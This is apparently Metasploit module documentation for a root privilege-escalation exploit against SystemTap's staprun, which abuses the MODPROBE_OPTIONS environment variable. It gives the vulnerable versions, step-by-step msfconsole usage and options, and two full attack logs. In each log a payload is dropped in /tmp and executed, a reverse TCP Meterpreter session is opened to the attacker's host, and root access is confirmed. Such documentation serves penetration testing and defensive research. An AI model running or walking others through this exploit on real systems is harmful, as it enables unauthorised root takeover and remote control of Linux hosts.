## Description

  This module attempts to gain root privileges by exploiting a
  vulnerability in the `staprun` executable included with SystemTap
  version 1.3.

  The `staprun` executable does not clear environment variables prior to
  executing `modprobe`, allowing an arbitrary configuration file to be
  specified in the `MODPROBE_OPTIONS` environment variable, resulting
  in arbitrary command execution with root privileges.


## Vulnerable Application

  This module has been tested successfully on:

  * systemtap 1.2-1.fc13-i686 on Fedora 13 (i686)
  * systemtap 1.1-3.el5 on RHEL 5.5 (x64)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. `use exploit/linux/local/systemtap_modprobe_options_priv_esc`
  4. `set SESSION [SESSION]`
  5. `check`
  6. `run`
  7. You should get a new *root* session


## Options

  **STAPRUN_PATH**

  Path to staprun executable (default: `/usr/bin/staprun`)

  **WritableDir**

  A writable directory file system path. (default: `/tmp`)


## Scenarios

### Red Hat Enterprise Linux 5.5 (x64)

  ```
  msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
  verbose => true
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
  
  [*] Started reverse TCP handler on 172.16.191.165:4444
  [+] /usr/bin/staprun is executable
  [+] /usr/bin/staprun is setuid
  [*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
  [*] Writing '/tmp/.rX9IoM53YEb92.conf' (23 bytes) ...
  [*] Executing payload...
  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (985320 bytes) to 172.16.191.202
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.202:52074) at 2019-04-18 12:50:56 -0400
  [+] Deleted /tmp/.rX9IoM53YEb92
  [+] Deleted /tmp/.rX9IoM53YEb92.conf
  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
  Retrying, after attempted removal of module As5A2hFpvQ2L (rc -1)
  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
  
  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo 
  Computer     : localhost.localdomain
  OS           : Red Hat Enterprise Linux 5 (Linux 2.6.18-194.el5)
  Architecture : x64
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter > 
  ```

### Fedora 13 (x86)

  ```
  msf > use exploit/linux/local/systemtap_modprobe_options_priv_esc
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
  session => 1
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
  verbose => true
  msf exploit(linux/local/systemtap_modprobe_options_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444
  [+] /usr/bin/staprun is executable
  [+] /usr/bin/staprun is setuid
  [*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
  [*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
  [*] Executing payload...
  [*] Transmitting intermediate stager...(106 bytes)
  [*] Sending stage (985320 bytes) to 172.16.191.138
  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
  Retrying, after attempted removal of module l0rDp93O8f (rc -1)
  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : fedora13.localdomain
  OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
  Architecture : i686
  BuildTuple   : i486-linux-musl
  Meterpreter  : x86/linux
  meterpreter >
  ```

